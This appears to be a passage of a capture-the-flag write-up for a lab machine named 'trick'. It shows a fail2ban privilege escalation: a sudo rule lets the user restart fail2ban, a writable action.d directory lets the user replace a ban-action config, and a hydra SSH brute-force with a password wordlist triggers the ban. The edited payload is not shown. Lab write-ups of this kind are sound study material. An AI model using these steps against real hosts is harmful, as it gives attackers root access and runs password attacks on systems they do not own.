Priv Esc

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/exploit-notes.hdks.org

michael@trick:~$ find /etc -writable -ls 2>/dev/null
   269281      4 drwxrwx---   2 root     security     4096 Feb 25 22:38 /etc/fail2ban/action.d

michael@trick:~$ cp /etc/fail2ban/action.d/iptables-multiport.conf ~
michael@trick:~$ vim ~/iptables-multiport.conf

michael@trick:~$ mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
mv: replace '/etc/fail2ban/action.d/iptables-multiport.conf', overriding mode 0644 (rw-r--r--)? y

michael@trick:~$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.

Trigger

adot@pwndot:~$ hydra -l root -P ~/rockyou.txt 10.10.11.166 ssh -vV -I

PreviousFoothold NextCredentials

Last updated 9 months ago

Was this helpful?